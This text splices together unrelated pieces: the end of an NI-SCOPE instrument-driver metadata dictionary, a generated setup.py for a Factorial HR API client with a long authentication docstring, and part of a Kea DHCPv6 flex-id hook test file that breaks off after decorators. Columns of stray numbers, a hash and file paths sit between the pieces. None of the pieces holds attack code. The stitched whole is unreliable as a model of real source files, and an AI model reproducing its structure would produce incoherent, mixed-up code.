'method_templates': [
{
'documentation_filename': 'default_method',
'method_python_name_suffix': '',
'session_filename': 'fancy_self_test'
}
],
'parameters': [
{
'direction': 'in',
'documentation': {
'description': 'The instrument handle you obtain from niScope_init that identifies a particular instrument session.'
},
'name': 'vi',
'type': 'ViSession'
}
],
'python_name': 'self_test',
'returns': 'ViStatus'
},
'init': {
'codegen_method': 'no',
'documentation': {
'description': '\nPerforms the following initialization actions:\n\n- Creates a new IVI instrument driver session\n- Opens a session to the specific driver using the interface and\n address you specify in the **resourceName**\n- Queries the instrument ID and checks that it is valid for NI-SCOPE,\n if the **IDQuery** is set to VI_TRUE\n- Resets the digitizer to a known state, if **resetDevice** is set to\n VI_TRUE\n- Sends initialization commands to set the instrument to the state\n necessary for the operation of the instrument driver\n- Returns an instrument handle that you use to identify the instrument\n in all subsequent instrument driver function calls\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'caution': '\nTraditional NI-DAQ and NI-DAQmx device names are not case-sensitive.\nHowever, all IVI names, such as logical names, are case-sensitive. If\nyou use logical names, driver session names, or virtual names in your\nprogram, you must make sure that the name you use matches the name in\nthe IVI Configuration Store file exactly, without any variations in the\ncase of the characters.\n',
'description': '\n**resourceName** specifies the resource name of the device to\ninitialize.\n\nresourceName Examples\n\nFor Traditional NI-DAQ devices, the syntax is DAQ::\\ *n*, where *n* is\nthe device number assigned by MAX, as shown in Example 1.\n\nFor NI-DAQmx devices, the syntax is just the device name specified in\nMAX, as shown in Example 2. Typical default names for NI-DAQmx devices\nin MAX are Dev1 or PXI1Slot1. You can rename an NI-DAQmx device by\nright-clicking on the name in MAX and entering a new name.\n\nAn alternate syntax for NI-DAQmx devices consists of DAQ::\\ *NI-DAQmx\ndevice name*, as shown in Example 3. This naming convention allows for\nthe use of an NI-DAQmx device in an application that was originally\ndesigned for a Traditional NI-DAQ device. For example, if the\napplication expects DAQ::1, you can rename the NI-DAQmx device to 1 in\nMAX and pass in DAQ::1 for the resource name, as shown in Example 4.\n\nIf you use the DAQ::\\ *n* syntax and an NI-DAQmx device name already\nexists with that same name, the NI-DAQmx device is matched first.\n\nYou can also pass in the name of an IVI logical name or an IVI virtual\nname configured with the IVI Configuration utility, as shown in Example\n5. A logical name identifies a particular virtual instrument. A virtual\nname identifies a specific device and specifies the initial settings for\nthe session.\n',
'table_body': [
[
'1',
'Traditional NI-DAQ device',
'DAQ::\\ *1*',
'(*1* = device number)'
],
[
'2',
'NI-DAQmx device',
'*myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'3',
'NI-DAQmx device',
'DAQ::\\ *myDAQmxDevice*',
'(*myDAQmxDevice* = device name)'
],
[
'4',
'NI-DAQmx device',
'DAQ::\\ *2*',
'(*2* = device name)'
],
[
'5',
'IVI logical name or IVI virtual name',
'*myLogicalName*',
'(*myLogicalName* = name)'
]
],
'table_header': [
'Example #',
'Device Type',
'Syntax',
'Variable'
]
},
'name': 'resourceName',
'type': 'ViRsrc'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to perform an ID query.\n\nWhen you set this parameter to VI_TRUE, NI-SCOPE verifies that the\ndevice you initialize is a type that it supports.\n\nWhen you set this parameter to VI_FALSE, the function initializes the\ndevice without performing an ID query.\n\n**Defined Values**\n\n| VI_TRUE—Perform ID query\n| VI_FALSE—Skip ID query\n\n**Default Value**: VI_TRUE\n'
},
'name': 'idQuery',
'type': 'ViBoolean'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to reset the device during the initialization process.\n\n**Defined Values**\n\n| VI_TRUE—Reset device\n| VI_FALSE—Do not reset device\n\n**Default Value**: VI_TRUE\n',
'note': '\nFor the NI 5112, repeatedly resetting the device may cause excessive\nwear on the electromechanical relays. Refer to `NI 5112\nElectromechanical Relays <REPLACE_DRIVER_SPECIFIC_URL_1(5112_relays)>`__\nfor recommended programming practices.\n'
},
'name': 'resetDevice',
'type': 'ViBoolean'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns a session handle that you can use to identify the device in all\nsubsequent NI-SCOPE function calls.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'reset': {
'documentation': {
'description': "\nStops the acquisition, releases routes, and all session attributes are\nreset to their `default\nstates <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cviattribute_defaults)>`__.\n"
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'revision_query': {
'codegen_method': 'no',
'documentation': {
'description': '\nReturns the revision numbers of the instrument driver and instrument\nfirmware.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the instrument driver software revision numbers in the form of a\nstring; you must pass a ViChar array at least\nIVI_MAX_MESSAGE_BUF_SIZE bytes in length.\n'
},
'name': 'driverRevision',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the instrument firmware revision numbers in the form of a\nstring; you must pass a ViChar array at least\nIVI_MAX_MESSAGE_BUF_SIZE bytes in length.\n'
},
'name': 'firmwareRevision',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
},
'self_test': {
'codegen_method': 'private',
'documentation': {
'description': 'Runs the instrument self-test routine and returns the test result(s).'
},
'method_name_for_documentation': 'self_test',
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'documentation': {
'description': '\nThis control contains the value returned from the instrument self-test.\n\n**Self-Test Code Description**\n\n0—Self-test passed\n\n1—Self-test failed\n'
},
'name': 'selfTestResult',
'type': 'ViInt16'
},
{
'direction': 'out',
'documentation': {
'description': '\nReturns the self-test response string from the instrument. Refer to the\ndevice-specific help topics for an explanation of the string contents;\nyou must pass a ViChar array at least IVI_MAX_MESSAGE_BUF_SIZE bytes\nin length.\n'
},
'name': 'selfTestMessage',
'size': {
'mechanism': 'fixed',
'value': 256
},
'type': 'ViChar[]'
}
],
'returns': 'ViStatus'
}
}
| 53.017618
| 1,778
| 0.540476
| 29,993
| 312,963
| 5.565099
| 0.055646
| 0.08469
| 0.05507
| 0.079682
| 0.795607
| 0.768252
| 0.74651
| 0.722138
| 0.709863
| 0.697521
| 0
| 0.006619
| 0.360356
| 312,963
| 5,902
| 1,779
| 53.026601
| 0.826625
| 0.000284
| 0
| 0.568475
| 1
| 0.060339
| 0.625581
| 0.081148
| 0
| 0
| 0
| 0
| 0.000508
| 1
| 0
| false
| 0.008644
| 0.001525
| 0
| 0.001525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ebcc3825fc097277e9fdeaf71248a959aca3f78e
| 14,706
|
py
|
Python
|
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | 1
|
2021-11-15T21:36:01.000Z
|
2021-11-15T21:36:01.000Z
|
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | null | null | null |
sdk-python/setup.py
|
factorialco/oas
|
8a2fc3b519b7e74566c94ebd220590d7a9c38aa3
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Generated by swagger-codegen for the Factorial public API client.
# Fixed here: broken markdown link target ".../oasLooking" -> ".../oas" and
# typos "applicatins"/"responsability" (both in the docstring and in the
# duplicated long_description below).
"""
Factorial API
Open Api Specifications available at [https://github.com/factorialco/oas](https://github.com/factorialco/oas) Guides and support available at [https://help.factorialhr.com/integrations](https://help.factorialhr.com/integrations) # Authentication The public API provides two methods of authentication, ApiKeys and OAuth2. The following sections provide information regarding each one and their intent. ## OAuth2 > OAuth2 is used to identify individual users, not applications or platforms. OAuth2 is available for authenticating to the public API and making requests via third parties **on behalf of a user**. All actions are authored on behalf of the user that creates the token. This means the intent is to be used mainly to do submit actions the actual user is performing on an alternative interface. To generate a token you will require opening an authorization dialog that returns a code, this code can then be exchanged for a token. ### Configuration In order to create an OAuth application, you must be an admin, head over to your [personal repository of OAuth applications](https://api.factorialhr.com/oauth/applications), click on `New application` and follow the creation process. The Factorial API enforces the same permissions at the user level than the Factorial web application. This means that Factorial API users will only be able to perform the same actions they are allowed to do in the Factorial platform. Next step will be to generate the Authorization Code you will need in order to generate an OAuth2 Token. ### OAuth2 Code Generation Should be generated via browser by opening the following url. The user should be already logged in to Factorial beforehand. `https://api.factorialhr.com/oauth/authorize?client_id=&redirect_uri=&response_type=code&scope=` YOUR_CLIENT_ID: OAuth2 Application Id REDIRECT_URI: OAuth2 Redirect URL #### State Parameter An optional query parameter called `state` can be added to the code generation url. 
Any string can be used and will be sent on the callback url. > Authorization protocols provide a `state` parameter that allows you to restore the previous state of your application. The `state` parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response. ### OAuth2 Token Generation Once you have the authorization code, you can request their access token to Factorial. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&code=&grant_type=authorization_code&redirect_uri='` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret AUTHORIZATION_CODE: OAuth2 CODE REDIRECT_URI: OAuth2 Redirect URL > You can generate only one OAuth2 token per Code, that means that if you want to generate a new token for a Code that already have one you should refresh your token. Every time a new token is generated a refresh token is generated as well, so that you can use it on the OAuth2 Refresh Token, and an expire date is also provided. ### OAuth2 Refresh Token You can generate a new token under the same Code with a new expire date (you can do it as many times as you need). A refresh token is also returned here so that you can use it on the OAuth2 Refresh Token again. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&refresh_token=&grant_type=refresh_token'` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret REFRESH_TOKEN: OAuth2 Refresh Token ### OAuth2 Token Usage The generated token is the credential for performing authenticated requests to Factorial. This token should be included in the Authorization header prefixed with the word Bearer and a separating space. As an example, if your token is `12345` then the header content should be `Bearer 12345`. ### Maintaining a persistent connection To maintain a persistent connection, you should not let the token expire. 
You can avoid this by simply refreshing your token before the expiration date. This will give you another token with a new expiration date, before that token expires you should refresh it again, and so on... If you want to do this automatically, you should provide something in your code that will help you perform the update every time the token expires. Otherwise, you would have to do the update manually and make sure you refresh your token before the expiration date to maintain the connection. ## ApiKeys > API keys are used to identify systems, not the individual users that access. ApiKeys have **TOTAL ACCESS** to everything and never expire. Its the creators responsibility to generate them and store them securely. ### Generation In the `Core>Keys` section of this documentation you can access the apis for managing this resource. ### Usage ApiKeys are a single string of symbols that must be added as a custom header on the request. The header name must be `x-api-key` and the key must be the value without any prefixes. ### Disclaimer ApiKey management require full admin permissions as the resource itself allows for full admin access to the entire platform on behalf of the company and not of a user, therefore any operations are not linked to any user in particular. # Development ## SDKs Coming soon ## Sandbox A sandbox/demo environment is available for testing integrations via public API calls. Developers can request provisioning with full access to a demo company where to test code before actually interacting with a production environment. Contact your account manager or account executive to request this environment and get OAuth2 credentials for generating tokens. Note: the domain for sandbox is different than that from production. Sandbox base domain is `http://api.demo.factorialhr.com` ## Postman Click the \"Run in Postman\" button to open the full list of endpoints on your Postman workspace as a Postman Collection. 
Inside the collection lookout for the Collection's Variables, configure your variables accordingly. ### Delegating Token Generation To Postman Coming soon # Changelog Coming soon # How to... ## Custom Fields Custom fields are useful when you want to add some fields that are not the default ones, to every employee of the company. For that, you have to create via Factorial App the base custom field in order to have all the employees with it. That option is available in customization, inside the company menu Once you have that, via API, you can [Create a value for a custom field](https://apidoc.factorialhr.com/#72f3f786-e37d-4e80-ada2-0beedd03b171) to each employee. You should know the custom field id in order to make that, you can check it by [getting a collection of custom fields](https://apidoc.factorialhr.com/#f98dae5a-a8d0-474e-a181-7e9603409b42) # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from setuptools import setup, find_packages  # noqa: H301

# Package identity used by setup() below.
NAME = "swagger-client"
VERSION = "1.0.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
# Runtime dependencies of the generated client.
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]

setup(
    name=NAME,
    version=VERSION,
    description="Factorial API",
    author_email="",
    url="",
    keywords=["Swagger", "Factorial API"],
    install_requires=REQUIRES,
    packages=find_packages(),
    include_package_data=True,
    # NOTE: swagger-codegen duplicates the API overview from the module
    # docstring here (without the title/version trailer); kept as generated.
    long_description="""\
Open Api Specifications available at [https://github.com/factorialco/oas](https://github.com/factorialco/oas) Guides and support available at [https://help.factorialhr.com/integrations](https://help.factorialhr.com/integrations) # Authentication The public API provides two methods of authentication, ApiKeys and OAuth2. The following sections provide information regarding each one and their intent. ## OAuth2 > OAuth2 is used to identify individual users, not applications or platforms. OAuth2 is available for authenticating to the public API and making requests via third parties **on behalf of a user**. All actions are authored on behalf of the user that creates the token. This means the intent is to be used mainly to do submit actions the actual user is performing on an alternative interface. To generate a token you will require opening an authorization dialog that returns a code, this code can then be exchanged for a token. ### Configuration In order to create an OAuth application, you must be an admin, head over to your [personal repository of OAuth applications](https://api.factorialhr.com/oauth/applications), click on `New application` and follow the creation process. The Factorial API enforces the same permissions at the user level than the Factorial web application. This means that Factorial API users will only be able to perform the same actions they are allowed to do in the Factorial platform. Next step will be to generate the Authorization Code you will need in order to generate an OAuth2 Token. ### OAuth2 Code Generation Should be generated via browser by opening the following url. The user should be already logged in to Factorial beforehand. `https://api.factorialhr.com/oauth/authorize?client_id=&redirect_uri=&response_type=code&scope=` YOUR_CLIENT_ID: OAuth2 Application Id REDIRECT_URI: OAuth2 Redirect URL #### State Parameter An optional query parameter called `state` can be added to the code generation url. 
Any string can be used and will be sent on the callback url. > Authorization protocols provide a `state` parameter that allows you to restore the previous state of your application. The `state` parameter preserves some state objects set by the client in the Authorization request and makes it available to the client in the response. ### OAuth2 Token Generation Once you have the authorization code, you can request their access token to Factorial. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&code=&grant_type=authorization_code&redirect_uri='` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret AUTHORIZATION_CODE: OAuth2 CODE REDIRECT_URI: OAuth2 Redirect URL > You can generate only one OAuth2 token per Code, that means that if you want to generate a new token for a Code that already have one you should refresh your token. Every time a new token is generated a refresh token is generated as well, so that you can use it on the OAuth2 Refresh Token, and an expire date is also provided. ### OAuth2 Refresh Token You can generate a new token under the same Code with a new expire date (you can do it as many times as you need). A refresh token is also returned here so that you can use it on the OAuth2 Refresh Token again. `curl -X POST 'https://api.factorialhr.com/oauth/token' -d 'client_id=&client_secret=&refresh_token=&grant_type=refresh_token'` YOUR_CLIENT_ID: OAuth2 Application Id YOUR_CLIENT_SECRET: OAuth2 Application Secret REFRESH_TOKEN: OAuth2 Refresh Token ### OAuth2 Token Usage The generated token is the credential for performing authenticated requests to Factorial. This token should be included in the Authorization header prefixed with the word Bearer and a separating space. As an example, if your token is `12345` then the header content should be `Bearer 12345`. ### Maintaining a persistent connection To maintain a persistent connection, you should not let the token expire. 
You can avoid this by simply refreshing your token before the expiration date. This will give you another token with a new expiration date, before that token expires you should refresh it again, and so on... If you want to do this automatically, you should provide something in your code that will help you perform the update every time the token expires. Otherwise, you would have to do the update manually and make sure you refresh your token before the expiration date to maintain the connection. ## ApiKeys > API keys are used to identify systems, not the individual users that access. ApiKeys have **TOTAL ACCESS** to everything and never expire. Its the creators responsibility to generate them and store them securely. ### Generation In the `Core>Keys` section of this documentation you can access the apis for managing this resource. ### Usage ApiKeys are a single string of symbols that must be added as a custom header on the request. The header name must be `x-api-key` and the key must be the value without any prefixes. ### Disclaimer ApiKey management require full admin permissions as the resource itself allows for full admin access to the entire platform on behalf of the company and not of a user, therefore any operations are not linked to any user in particular. # Development ## SDKs Coming soon ## Sandbox A sandbox/demo environment is available for testing integrations via public API calls. Developers can request provisioning with full access to a demo company where to test code before actually interacting with a production environment. Contact your account manager or account executive to request this environment and get OAuth2 credentials for generating tokens. Note: the domain for sandbox is different than that from production. Sandbox base domain is `http://api.demo.factorialhr.com` ## Postman Click the \"Run in Postman\" button to open the full list of endpoints on your Postman workspace as a Postman Collection. 
Inside the collection lookout for the Collection's Variables, configure your variables accordingly. ### Delegating Token Generation To Postman Coming soon # Changelog Coming soon # How to... ## Custom Fields Custom fields are useful when you want to add some fields that are not the default ones, to every employee of the company. For that, you have to create via Factorial App the base custom field in order to have all the employees with it. That option is available in customization, inside the company menu Once you have that, via API, you can [Create a value for a custom field](https://apidoc.factorialhr.com/#72f3f786-e37d-4e80-ada2-0beedd03b171) to each employee. You should know the custom field id in order to make that, you can check it by [getting a collection of custom fields](https://apidoc.factorialhr.com/#f98dae5a-a8d0-474e-a181-7e9603409b42) # noqa: E501
"""
)
| 367.65
| 7,123
| 0.785598
| 2,335
| 14,706
| 4.921627
| 0.162741
| 0.010442
| 0.006265
| 0.015315
| 0.910982
| 0.903498
| 0.898625
| 0.898364
| 0.890707
| 0.890707
| 0
| 0.019649
| 0.155583
| 14,706
| 39
| 7,124
| 377.076923
| 0.905782
| 0.48198
| 0
| 0
| 0
| 0.055556
| 0.9537
| 0.038781
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ebd1272e73933e29f972fbc9568feb6d0204d767
| 50,497
|
py
|
Python
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 22
|
2015-02-27T11:51:05.000Z
|
2022-02-28T12:39:29.000Z
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 16
|
2018-10-30T15:00:12.000Z
|
2019-01-11T17:55:13.000Z
|
tests/dhcpv6/kea_only/flexid/test_flex_id.py
|
isc-projects/forge
|
dfec8b41003d6b5a229f69ee93616e0e5cc6d71b
|
[
"0BSD"
] | 11
|
2015-02-27T11:51:36.000Z
|
2021-03-30T08:33:54.000Z
|
"""Kea Hook flex-id testing"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_msg
import misc
import srv_control
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_1():
    """Reservation keyed on the first 8 bytes of the relay interface-id is honoured."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", "'port1234'")
    srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "substring(relay6[0].option[18].hex,0,8)")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    # Relayed SOLICIT whose interface-id starts with "port1234".
    misc.test_procedure()
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")
    srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
    srv_msg.client_does_include("RelayAgent", "interface-id")
    srv_msg.create_relay_forward()

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
    srv_msg.response_check_include_option(18)
    srv_msg.response_check_include_option(9)
    srv_msg.response_check_option_content(9, "Relayed", "Message")
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    # The relayed advertise must carry the reserved address.
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_libreload():
    """flex-id classification keeps working after a 'libreload' control command."""

    def _solicit_and_expect_reservation():
        # One relayed SOLICIT/RELAYREPLY exchange ending with the reserved address.
        misc.test_procedure()
        srv_msg.client_does_include("Client", "client-id")
        srv_msg.client_does_include("Client", "IA-NA")
        srv_msg.client_send_msg("SOLICIT")
        srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
        srv_msg.client_does_include("RelayAgent", "interface-id")
        srv_msg.create_relay_forward()
        misc.pass_criteria()
        srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
        srv_msg.response_check_include_option(18)
        srv_msg.response_check_include_option(9)
        srv_msg.response_check_option_content(9, "Relayed", "Message")
        srv_msg.response_check_include_option(1)
        srv_msg.response_check_include_option(2)
        srv_msg.response_check_include_option(3)
        srv_msg.response_check_option_content(3, "sub-option", 5)
        srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")

    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", "'port1234'")
    srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "substring(relay6[0].option[18].hex,0,8)")
    srv_control.open_control_channel()
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    _solicit_and_expect_reservation()
    srv_msg.send_ctrl_cmd_via_socket('{"command": "libreload","arguments": {}}')
    # If the hook reload worked, classification must behave exactly as before.
    _solicit_and_expect_reservation()
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_reconfigure_1():
    """flex-id reservation still matches after reconfiguring with an identical config."""

    def _configure(start_mode):
        # Build and apply the same flex-id configuration; start_mode selects
        # initial start vs. reconfigure.
        misc.test_setup()
        srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
        srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", "'port1234'")
        srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
        srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
        srv_control.add_hooks("libdhcp_flex_id.so")
        srv_control.add_parameter_to_hook(1, "identifier-expression", "substring(relay6[0].option[18].hex,0,8)")
        srv_control.open_control_channel()
        srv_control.build_and_send_config_files()
        srv_control.start_srv("DHCP", start_mode)

    def _solicit_and_expect_reservation():
        # One relayed SOLICIT/RELAYREPLY exchange ending with the reserved address.
        misc.test_procedure()
        srv_msg.client_does_include("Client", "client-id")
        srv_msg.client_does_include("Client", "IA-NA")
        srv_msg.client_send_msg("SOLICIT")
        srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
        srv_msg.client_does_include("RelayAgent", "interface-id")
        srv_msg.create_relay_forward()
        misc.pass_criteria()
        srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
        srv_msg.response_check_include_option(18)
        srv_msg.response_check_include_option(9)
        srv_msg.response_check_option_content(9, "Relayed", "Message")
        srv_msg.response_check_include_option(1)
        srv_msg.response_check_include_option(2)
        srv_msg.response_check_include_option(3)
        srv_msg.response_check_option_content(3, "sub-option", 5)
        srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")

    _configure("started")
    _solicit_and_expect_reservation()
    _configure("reconfigured")
    _solicit_and_expect_reservation()
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_reconfigure_2():
    """After reconfiguring the flex-id value, only the new interface-id matches."""

    def _configure(flex_id, start_mode):
        # Apply a flex-id configuration reserving 3000::f for the given identifier.
        misc.test_setup()
        srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
        srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", flex_id)
        srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
        srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
        srv_control.add_hooks("libdhcp_flex_id.so")
        srv_control.add_parameter_to_hook(1, "identifier-expression", "substring(relay6[0].option[18].hex,0,8)")
        srv_control.open_control_channel()
        srv_control.build_and_send_config_files()
        srv_control.start_srv("DHCP", start_mode)

    def _relayed_solicit(ifaceid):
        # Relayed SOLICIT with the given interface-id; common RELAYREPLY checks.
        misc.test_procedure()
        srv_msg.client_does_include("Client", "client-id")
        srv_msg.client_does_include("Client", "IA-NA")
        srv_msg.client_send_msg("SOLICIT")
        srv_msg.client_sets_value("RelayAgent", "ifaceid", ifaceid)
        srv_msg.client_does_include("RelayAgent", "interface-id")
        srv_msg.create_relay_forward()
        misc.pass_criteria()
        srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
        srv_msg.response_check_include_option(18)
        srv_msg.response_check_include_option(9)
        srv_msg.response_check_option_content(9, "Relayed", "Message")
        srv_msg.response_check_include_option(1)
        srv_msg.response_check_include_option(2)
        srv_msg.response_check_include_option(3)
        srv_msg.response_check_option_content(3, "sub-option", 5)

    _configure("'port1234'", "started")
    _relayed_solicit("port1234")
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")

    # Reconfigure the reservation to match "port4321" instead.
    _configure("'port4321'", "reconfigured")
    # The old interface-id must no longer receive the reserved address...
    _relayed_solicit("port1234")
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f", expect_include=False)
    # ...while the new one must.
    _relayed_solicit("port4321")
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_2():
    """Reservation keyed on the full relay interface-id hex is honoured."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", "'port1234'")
    srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    # Whole interface-id (option 18) used as the identifier this time.
    srv_control.add_parameter_to_hook(1, "identifier-expression", "relay6[0].option[18].hex")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    misc.test_procedure()
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")
    srv_msg.client_sets_value("RelayAgent", "ifaceid", "port1234")
    srv_msg.client_does_include("RelayAgent", "interface-id")
    srv_msg.create_relay_forward()

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "RELAYREPLY")
    srv_msg.response_check_include_option(18)
    srv_msg.response_check_include_option(9)
    srv_msg.response_check_option_content(9, "Relayed", "Message")
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    # The relayed advertise must carry the reserved address.
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_3():
    """Reservation keyed on vendor (enterprise 4491) sub-option 1026 is honoured."""
    misc.test_setup()
    srv_control.config_srv_subnet("3000::/64", "3000::1-3000::ff")
    srv_control.host_reservation_in_subnet("hostname", "reserved-hostname", 0, "flex-id", "01:02:03:04:05:06")
    srv_control.host_reservation_in_subnet_add_value(0, 0, "ip-address", "3000::f")
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks("libdhcp_flex_id.so")
    srv_control.add_parameter_to_hook(1, "identifier-expression", "vendor[4491].option[1026].hex")
    srv_control.build_and_send_config_files()
    srv_control.start_srv("DHCP", "started")

    # Direct SOLICIT carrying the matching vendor sub-option.
    misc.test_procedure()
    srv_msg.client_sets_value("Client", "enterprisenum", "4491")
    srv_msg.client_does_include("Client", "vendor-class")
    srv_msg.add_vendor_suboption("Client", 1026, "01:02:03:04:05:06")
    srv_msg.client_does_include("Client", "vendor-specific-info")
    srv_msg.client_does_include("Client", "client-id")
    srv_msg.client_does_include("Client", "IA-NA")
    srv_msg.client_send_msg("SOLICIT")

    misc.pass_criteria()
    srv_msg.send_wait_for_message("MUST", "ADVERTISE")
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, "sub-option", 5)
    srv_msg.response_check_suboption_content(5, 3, "addr", "3000::f")
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
